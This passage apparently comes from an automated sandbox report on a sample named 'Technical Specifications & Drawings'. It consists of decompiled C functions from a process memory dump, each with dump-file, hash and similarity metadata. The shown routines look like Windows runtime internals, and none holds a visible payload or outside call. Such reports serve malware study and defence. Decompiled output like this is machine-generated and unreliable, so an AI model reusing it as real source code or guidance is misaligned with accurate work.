                                                  												_t74 = _t74 + 1;
                                                  											}
                                                  										}
                                                  										_t38 = _t90 + 0x14; // 0x0
                                                  										_t39 = _t90 + 0x14; // 0x0
                                                  										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                                  										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                  											_t85 = _t85 & 0xff000000;
                                                  										}
                                                  										 *(_t90 + 0x14) = _t85;
                                                  									}
                                                  									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                  									 *((intOrPtr*)(_t90 + 8)) = 1;
                                                  									return 0;
                                                  								}
                                                  								_v5 = 1;
                                                  								_t87 = _t74;
                                                  								goto L19;
                                                  							}
                                                  						}
                                                  						_t94 = _t74;
                                                  						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                                  						if(_t74 == 0) {
                                                  							goto L12;
                                                  						} else {
                                                  							_t91 = _t90 + 4;
                                                  							goto L8;
                                                  							L9:
                                                  							while((_t81 & 0x00000001) != 0) {
                                                  								_t69 = _t81;
                                                  								asm("lock cmpxchg [edi], edx");
                                                  								if(_t69 != _t81) {
                                                  									_t81 = _t69;
                                                  									continue;
                                                  								}
                                                  								_t90 = _v16;
                                                  								goto L25;
                                                  							}
                                                  							asm("pause");
                                                  							_t94 = _t94 - 1;
                                                  							if(_t94 != 0) {
                                                  								L8:
                                                  								_t81 =  *_t91;
                                                  								goto L9;
                                                  							} else {
                                                  								_t90 = _v16;
                                                  								_t79 = _v5;
                                                  								goto L12;
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                  • Instruction ID: 7579618e380c244648db0cd2029394c20670b6480f8a3f98c987a416e6f5aa98
                                                  • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                  • Instruction Fuzzy Hash: 4C510030E04249DFEB25CB6CC8D4BEEFBB1AF05314F1881A8D54597392C775AA89C791
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 84%
                                                  			E0187740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                                  				signed short* _v8;
                                                  				intOrPtr _v12;
                                                  				intOrPtr _t55;
                                                  				void* _t56;
                                                  				intOrPtr* _t66;
                                                  				intOrPtr* _t69;
                                                  				void* _t74;
                                                  				intOrPtr* _t78;
                                                  				intOrPtr* _t81;
                                                  				intOrPtr* _t82;
                                                  				intOrPtr _t83;
                                                  				signed short* _t84;
                                                  				intOrPtr _t85;
                                                  				signed int _t87;
                                                  				intOrPtr* _t90;
                                                  				intOrPtr* _t93;
                                                  				intOrPtr* _t94;
                                                  				void* _t98;
                                                  
                                                  				_t84 = __edx;
                                                  				_t80 = __ecx;
                                                  				_push(__ecx);
                                                  				_push(__ecx);
                                                  				_t55 = __ecx;
                                                  				_v8 = __edx;
                                                  				_t87 =  *__edx & 0x0000ffff;
                                                  				_v12 = __ecx;
                                                  				_t3 = _t55 + 0x154; // 0x154
                                                  				_t93 = _t3;
                                                  				_t78 =  *_t93;
                                                  				_t4 = _t87 + 2; // 0x2
                                                  				_t56 = _t4;
                                                  				while(_t78 != _t93) {
                                                  					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                                  						L4:
                                                  						_t78 =  *_t78;
                                                  						continue;
                                                  					} else {
                                                  						_t7 = _t78 + 0x18; // 0x18
                                                  						if(E017FD4F0(_t7, _t84[2], _t87) == _t87) {
                                                  							_t40 = _t78 + 0xc; // 0xc
                                                  							_t94 = _t40;
                                                  							_t90 =  *_t94;
                                                  							while(_t90 != _t94) {
                                                  								_t41 = _t90 + 8; // 0x8
                                                  								_t74 = E017EF380(_a4, _t41, 0x10);
                                                  								_t98 = _t98 + 0xc;
                                                  								if(_t74 != 0) {
                                                  									_t90 =  *_t90;
                                                  									continue;
                                                  								}
                                                  								goto L12;
                                                  							}
                                                  							_t82 = L017C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                  							if(_t82 != 0) {
                                                  								_t46 = _t78 + 0xc; // 0xc
                                                  								_t69 = _t46;
                                                  								asm("movsd");
                                                  								asm("movsd");
                                                  								asm("movsd");
                                                  								asm("movsd");
                                                  								_t85 =  *_t69;
                                                  								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                  									L20:
                                                  									_t82 = 3;
                                                  									asm("int 0x29");
                                                  								}
                                                  								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                                  								 *_t82 = _t85;
                                                  								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                                  								 *_t69 = _t82;
                                                  								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                                  								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                                  								goto L11;
                                                  							} else {
                                                  								L18:
                                                  								_push(0xe);
                                                  								_pop(0);
                                                  							}
                                                  						} else {
                                                  							_t84 = _v8;
                                                  							_t9 = _t87 + 2; // 0x2
                                                  							_t56 = _t9;
                                                  							goto L4;
                                                  						}
                                                  					}
                                                  					L12:
                                                  					return 0;
                                                  				}
                                                  				_t10 = _t87 + 0x1a; // 0x1a
                                                  				_t78 = L017C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                                  				if(_t78 == 0) {
                                                  					goto L18;
                                                  				} else {
                                                  					_t12 = _t87 + 2; // 0x2
                                                  					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                                  					_t16 = _t78 + 0x18; // 0x18
                                                  					E017EF3E0(_t16, _v8[2], _t87);
                                                  					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                                  					_t19 = _t78 + 0xc; // 0xc
                                                  					_t66 = _t19;
                                                  					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                                  					 *_t66 = _t66;
                                                  					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                                  					_t81 = L017C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                  					if(_t81 == 0) {
                                                  						goto L18;
                                                  					} else {
                                                  						_t26 = _t78 + 0xc; // 0xc
                                                  						_t69 = _t26;
                                                  						asm("movsd");
                                                  						asm("movsd");
                                                  						asm("movsd");
                                                  						asm("movsd");
                                                  						_t85 =  *_t69;
                                                  						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                  							goto L20;
                                                  						} else {
                                                  							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                                  							 *_t81 = _t85;
                                                  							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                                  							 *_t69 = _t81;
                                                  							_t83 = _v12;
                                                  							 *(_t78 + 8) = 1;
                                                  							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                  							_t34 = _t83 + 0x154; // 0x1ba
                                                  							_t69 = _t34;
                                                  							_t85 =  *_t69;
                                                  							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                  								goto L20;
                                                  							} else {
                                                  								 *_t78 = _t85;
                                                  								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                                  								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                                  								 *_t69 = _t78;
                                                  								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                  							}
                                                  						}
                                                  						goto L11;
                                                  					}
                                                  				}
                                                  				goto L12;
                                                  			}






















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                  • Instruction ID: 290c1b088fdaaeb602c8c5d8c7888ec283af2010f80565dffddd394f9595bcc6
                                                  • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                  • Instruction Fuzzy Hash: E0517A71600646EFDB26CF18C484A96FBF5FF45704F1481AAE908DF216E371EA46CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 97%
                                                  			E017D2990() {
                                                  				signed int* _t62;
                                                  				signed int _t64;
                                                  				intOrPtr _t66;
                                                  				signed short* _t69;
                                                  				intOrPtr _t76;
                                                  				signed short* _t79;
                                                  				void* _t81;
                                                  				signed int _t82;
                                                  				signed short* _t83;
                                                  				signed int _t87;
                                                  				intOrPtr _t91;
                                                  				void* _t98;
                                                  				signed int _t99;
                                                  				void* _t101;
                                                  				signed int* _t102;
                                                  				void* _t103;
                                                  				void* _t104;
                                                  				void* _t107;
                                                  
                                                  				_push(0x20);
                                                  				_push(0x187ff00);
                                                  				E017FD08C(_t81, _t98, _t101);
                                                  				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                                                  				_t99 = 0;
                                                  				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                                                  				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                                                  				if(_t82 == 0) {
                                                  					_t62 = 0xc0000100;
                                                  				} else {
                                                  					 *((intOrPtr*)(_t103 - 4)) = 0;
                                                  					_t102 = 0xc0000100;
                                                  					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                                                  					_t64 = 4;
                                                  					while(1) {
                                                  						 *(_t103 - 0x24) = _t64;
                                                  						if(_t64 == 0) {
                                                  							break;
                                                  						}
                                                  						_t87 = _t64 * 0xc;
                                                  						 *(_t103 - 0x2c) = _t87;
                                                  						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1781664));
                                                  						if(_t107 <= 0) {
                                                  							if(_t107 == 0) {
                                                  								_t79 = E017EE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1781668)), _t82);
                                                  								_t104 = _t104 + 0xc;
                                                  								__eflags = _t79;
                                                  								if(__eflags == 0) {
                                                  									_t102 = E018251BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x178166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                  									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                                                  									break;
                                                  								} else {
                                                  									_t64 =  *(_t103 - 0x24);
                                                  									goto L5;
                                                  								}
                                                  								goto L13;
                                                  							} else {
                                                  								L5:
                                                  								_t64 = _t64 - 1;
                                                  								continue;
                                                  							}
                                                  						}
                                                  						break;
                                                  					}
                                                  					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                  					__eflags = _t102;
                                                  					if(_t102 < 0) {
                                                  						__eflags = _t102 - 0xc0000100;
                                                  						if(_t102 == 0xc0000100) {
                                                  							_t83 =  *((intOrPtr*)(_t103 + 8));
                                                  							__eflags = _t83;
                                                  							if(_t83 != 0) {
                                                  								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                                                  								__eflags =  *_t83 - _t99;
                                                  								if( *_t83 == _t99) {
                                                  									_t102 = 0xc0000100;
                                                  									goto L19;
                                                  								} else {
                                                  									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                                                  									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                                                  									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                                                  									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                                                  										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                                                  										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                                                  											L26:
                                                  											_t102 = E017D2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                  											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                  											__eflags = _t102 - 0xc0000100;
                                                  											if(_t102 != 0xc0000100) {
                                                  												goto L12;
                                                  											} else {
                                                  												_t99 = 1;
                                                  												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                                                  												goto L18;
                                                  											}
                                                  										} else {
                                                  											_t69 = E017B6600( *((intOrPtr*)(_t91 + 0x1c)));
                                                  											__eflags = _t69;
                                                  											if(_t69 != 0) {
                                                  												goto L26;
                                                  											} else {
                                                  												_t83 =  *((intOrPtr*)(_t103 + 8));
                                                  												goto L18;
                                                  											}
                                                  										}
                                                  									} else {
                                                  										L18:
                                                  										_t102 = E017D2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                                                  										L19:
                                                  										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                  										goto L12;
                                                  									}
                                                  								}
                                                  								L28:
                                                  							} else {
                                                  								E017BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                  								 *((intOrPtr*)(_t103 - 4)) = 1;
                                                  								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                                                  								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                                                  								_t76 = E017D2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                                                  								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                                                  								__eflags = _t76 - 0xc0000100;
                                                  								if(_t76 == 0xc0000100) {
                                                  									 *((intOrPtr*)(_t103 - 0x1c)) = E017D2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                                                  								}
                                                  								 *((intOrPtr*)(_t103 - 4)) = _t99;
                                                  								E017D2ACB();
                                                  							}
                                                  						}
                                                  					}
                                                  					L12:
                                                  					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                                                  					_t62 = _t102;
                                                  				}
                                                  				L13:
                                                  				return E017FD0D1(_t62);
                                                  				goto L28;
                                                  			}


                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7389688c56e8d5fa2b8b191012564c60e4d6aaf59a35f2b96a8ce76a160b7a28
                                                  • Instruction ID: 4825858d1082cf4573eb08fa09ecbd359079a926c72452bf7f4d9d94f81f3606
                                                  • Opcode Fuzzy Hash: 7389688c56e8d5fa2b8b191012564c60e4d6aaf59a35f2b96a8ce76a160b7a28
                                                  • Instruction Fuzzy Hash: E6515971A0020AEFDF25DF59C880ADEBBB5FF88310F148155E914AB226D7359A52CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 85%
                                                  			E017D4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                                                  				signed int _v8;
                                                  				short _v20;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				char _v36;
                                                  				char _v156;
                                                  				short _v158;
                                                  				intOrPtr _v160;
                                                  				char _v164;
                                                  				intOrPtr _v168;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t45;
                                                  				intOrPtr _t74;
                                                  				signed char _t77;
                                                  				intOrPtr _t84;
                                                  				char* _t85;
                                                  				void* _t86;
                                                  				intOrPtr _t87;
                                                  				signed short _t88;
                                                  				signed int _t89;
                                                  
                                                  				_t83 = __edx;
                                                  				_v8 =  *0x189d360 ^ _t89;
                                                  				_t45 = _a8 & 0x0000ffff;
                                                  				_v158 = __edx;
                                                  				_v168 = __ecx;
                                                  				if(_t45 == 0) {
                                                  					L22:
                                                  					_t86 = 6;
                                                  					L12:
                                                  					E017ACC50(_t86);
                                                  					L11:
                                                  					return E017EB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                                                  				}
                                                  				_t77 = _a4;
                                                  				if((_t77 & 0x00000001) != 0) {
                                                  					goto L22;
                                                  				}
                                                  				_t8 = _t77 + 0x34; // 0xdce0ba00
                                                  				if(_t45 !=  *_t8) {
                                                  					goto L22;
                                                  				}
                                                  				_t9 = _t77 + 0x24; // 0x1898504
                                                  				E017C2280(_t9, _t9);
                                                  				_t87 = 0x78;
                                                  				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                                                  				E017EFA60( &_v156, 0, _t87);
                                                  				_t13 = _t77 + 0x30; // 0x3db8
                                                  				_t85 =  &_v156;
                                                  				_v36 =  *_t13;
                                                  				_v28 = _v168;
                                                  				_v32 = 0;
                                                  				_v24 = 0;
                                                  				_v20 = _v158;
                                                  				_v160 = 0;
                                                  				while(1) {
                                                  					_push( &_v164);
                                                  					_push(_t87);
                                                  					_push(_t85);
                                                  					_push(0x18);
                                                  					_push( &_v36);
                                                  					_push(0x1e);
                                                  					_t88 = E017EB0B0();
                                                  					if(_t88 != 0xc0000023) {
                                                  						break;
                                                  					}
                                                  					if(_t85 !=  &_v156) {
                                                  						L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                                                  					}
                                                  					_t84 = L017C4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                                                  					_v168 = _v164;
                                                  					if(_t84 == 0) {
                                                  						_t88 = 0xc0000017;
                                                  						goto L19;
                                                  					} else {
                                                  						_t74 = _v160 + 1;
                                                  						_v160 = _t74;
                                                  						if(_t74 >= 0x10) {
                                                  							L19:
                                                  							_t86 = E017ACCC0(_t88);
                                                  							if(_t86 != 0) {
                                                  								L8:
                                                  								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                                                  								_t30 = _t77 + 0x24; // 0x1898504
                                                  								E017BFFB0(_t77, _t84, _t30);
                                                  								if(_t84 != 0 && _t84 !=  &_v156) {
                                                  									L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                                                  								}
                                                  								if(_t86 != 0) {
                                                  									goto L12;
                                                  								} else {
                                                  									goto L11;
                                                  								}
                                                  							}
                                                  							L6:
                                                  							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                                                  							if(_v164 != 0) {
                                                  								_t83 = _t84;
                                                  								E017D4F49(_t77, _t84);
                                                  							}
                                                  							goto L8;
                                                  						}
                                                  						_t87 = _v168;
                                                  						continue;
                                                  					}
                                                  				}
                                                  				if(_t88 != 0) {
                                                  					goto L19;
                                                  				}
                                                  				goto L6;
                                                  			}



























                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ab99c5fd5f55f19c900d5880ff50c6753359cf402c2f53ea6681c00bb1de9ef6
                                                  • Instruction ID: 79fc222fac01a222b2bc3d4d9bc54294a296369026492035d25e05391dcc020f
                                                  • Opcode Fuzzy Hash: ab99c5fd5f55f19c900d5880ff50c6753359cf402c2f53ea6681c00bb1de9ef6
                                                  • Instruction Fuzzy Hash: 6341B732A0021D9BDB31DF68C944BEAB7F8AF45700F0105A9E949EB245EB74DE40CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 78%
                                                  			E017D4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                  				signed int _v12;
                                                  				char _v176;
                                                  				char _v177;
                                                  				char _v184;
                                                  				intOrPtr _v192;
                                                  				intOrPtr _v196;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed short _t42;
                                                  				char* _t44;
                                                  				intOrPtr _t46;
                                                  				intOrPtr _t50;
                                                  				char* _t57;
                                                  				intOrPtr _t59;
                                                  				intOrPtr _t67;
                                                  				signed int _t69;
                                                  
                                                  				_t64 = __edx;
                                                  				_v12 =  *0x189d360 ^ _t69;
                                                  				_t65 = 0xa0;
                                                  				_v196 = __edx;
                                                  				_v177 = 0;
                                                  				_t67 = __ecx;
                                                  				_v192 = __ecx;
                                                  				E017EFA60( &_v176, 0, 0xa0);
                                                  				_t57 =  &_v176;
                                                  				_t59 = 0xa0;
                                                  				if( *0x1897bc8 != 0) {
                                                  					L3:
                                                  					while(1) {
                                                  						asm("movsd");
                                                  						asm("movsd");
                                                  						asm("movsd");
                                                  						asm("movsd");
                                                  						_t67 = _v192;
                                                  						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                                  						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                                  						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                                  						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                                  						_push( &_v184);
                                                  						_push(_t59);
                                                  						_push(_t57);
                                                  						_push(0xa0);
                                                  						_push(_t57);
                                                  						_push(0xf);
                                                  						_t42 = E017EB0B0();
                                                  						if(_t42 != 0xc0000023) {
                                                  							break;
                                                  						}
                                                  						if(_v177 != 0) {
                                                  							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                  						}
                                                  						_v177 = 1;
                                                  						_t44 = L017C4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                                  						_t59 = _v184;
                                                  						_t57 = _t44;
                                                  						if(_t57 != 0) {
                                                  							continue;
                                                  						} else {
                                                  							_t42 = 0xc0000017;
                                                  							break;
                                                  						}
                                                  					}
                                                  					if(_t42 != 0) {
                                                  						_t65 = E017ACCC0(_t42);
                                                  						if(_t65 != 0) {
                                                  							L10:
                                                  							if(_v177 != 0) {
                                                  								if(_t57 != 0) {
                                                  									L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                  								}
                                                  							}
                                                  							_t46 = _t65;
                                                  							L12:
                                                  							return E017EB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                                  						}
                                                  						L7:
                                                  						_t50 = _a4;
                                                  						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                                  						if(_t50 != 3) {
                                                  							if(_t50 == 2) {
                                                  								goto L8;
                                                  							}
                                                  							L9:
                                                  							if(E017EF380(_t67 + 0xc, 0x1785138, 0x10) == 0) {
                                                  								 *0x18960d8 = _t67;
                                                  							}
                                                  							goto L10;
                                                  						}
                                                  						L8:
                                                  						_t64 = _t57 + 0x28;
                                                  						E017D4F49(_t67, _t57 + 0x28);
                                                  						goto L9;
                                                  					}
                                                  					_t65 = 0;
                                                  					goto L7;
                                                  				}
                                                  				if(E017D4E70(0x18986b0, 0x17d5690, 0, 0) != 0) {
                                                  					_t46 = E017ACCC0(_t56);
                                                  					goto L12;
                                                  				} else {
                                                  					_t59 = 0xa0;
                                                  					goto L3;
                                                  				}
                                                  			}





















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0bbb1dccc8dccf15fe52bb802067a29e46116077479b0e214ed8d67bf052f2a1
                                                  • Instruction ID: 6d77df1758a51e6acc7b8050c3db747fe60c8e4777dbdfdac7fe54c54b78ea4a
                                                  • Opcode Fuzzy Hash: 0bbb1dccc8dccf15fe52bb802067a29e46116077479b0e214ed8d67bf052f2a1
                                                  • Instruction Fuzzy Hash: 6641B271A44318AFEB32DF18CC88F66F7B9EB59710F040099E9469B685D7B4DE40CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 94%
                                                  			E017B8A0A(intOrPtr* __ecx, signed int __edx) {
                                                  				signed int _v8;
                                                  				char _v524;
                                                  				signed int _v528;
                                                  				void* _v532;
                                                  				char _v536;
                                                  				char _v540;
                                                  				char _v544;
                                                  				intOrPtr* _v548;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t44;
                                                  				void* _t46;
                                                  				void* _t48;
                                                  				signed int _t53;
                                                  				signed int _t55;
                                                  				intOrPtr* _t62;
                                                  				void* _t63;
                                                  				unsigned int _t75;
                                                  				signed int _t79;
                                                  				unsigned int _t81;
                                                  				unsigned int _t83;
                                                  				signed int _t84;
                                                  				void* _t87;
                                                  
                                                  				_t76 = __edx;
                                                  				_v8 =  *0x189d360 ^ _t84;
                                                  				_v536 = 0x200;
                                                  				_t79 = 0;
                                                  				_v548 = __edx;
                                                  				_v544 = 0;
                                                  				_t62 = __ecx;
                                                  				_v540 = 0;
                                                  				_v532 =  &_v524;
                                                  				if(__edx == 0 || __ecx == 0) {
                                                  					L6:
                                                  					return E017EB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                                  				} else {
                                                  					_v528 = 0;
                                                  					E017BE9C0(1, __ecx, 0, 0,  &_v528);
                                                  					_t44 = _v528;
                                                  					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                                  					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                                  					_t46 = 0xa;
                                                  					_t87 = _t81 - _t46;
                                                  					if(_t87 > 0 || _t87 == 0) {
                                                  						 *_v548 = 0x1781180;
                                                  						L5:
                                                  						_t79 = 1;
                                                  						goto L6;
                                                  					} else {
                                                  						_t48 = E017D1DB5(_t62,  &_v532,  &_v536);
                                                  						_t76 = _v528;
                                                  						if(_t48 == 0) {
                                                  							L9:
                                                  							E017E3C2A(_t81, _t76,  &_v544);
                                                  							 *_v548 = _v544;
                                                  							goto L5;
                                                  						}
                                                  						_t62 = _v532;
                                                  						if(_t62 != 0) {
                                                  							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                                  							_t53 =  *_t62;
                                                  							_v528 = _t53;
                                                  							if(_t53 != 0) {
                                                  								_t63 = _t62 + 4;
                                                  								_t55 = _v528;
                                                  								do {
                                                  									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                                  										if(E017B8999(_t63,  &_v540) == 0) {
                                                  											_t55 = _v528;
                                                  										} else {
                                                  											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                                  											_t55 = _v528;
                                                  											if(_t75 >= _t83) {
                                                  												_t83 = _t75;
                                                  											}
                                                  										}
                                                  									}
                                                  									_t63 = _t63 + 0x14;
                                                  									_t55 = _t55 - 1;
                                                  									_v528 = _t55;
                                                  								} while (_t55 != 0);
                                                  								_t62 = _v532;
                                                  							}
                                                  							if(_t62 !=  &_v524) {
                                                  								L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                                  							}
                                                  							_t76 = _t83 & 0x0000ffff;
                                                  							_t81 = _t83 >> 0x10;
                                                  						}
                                                  						goto L9;
                                                  					}
                                                  				}
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
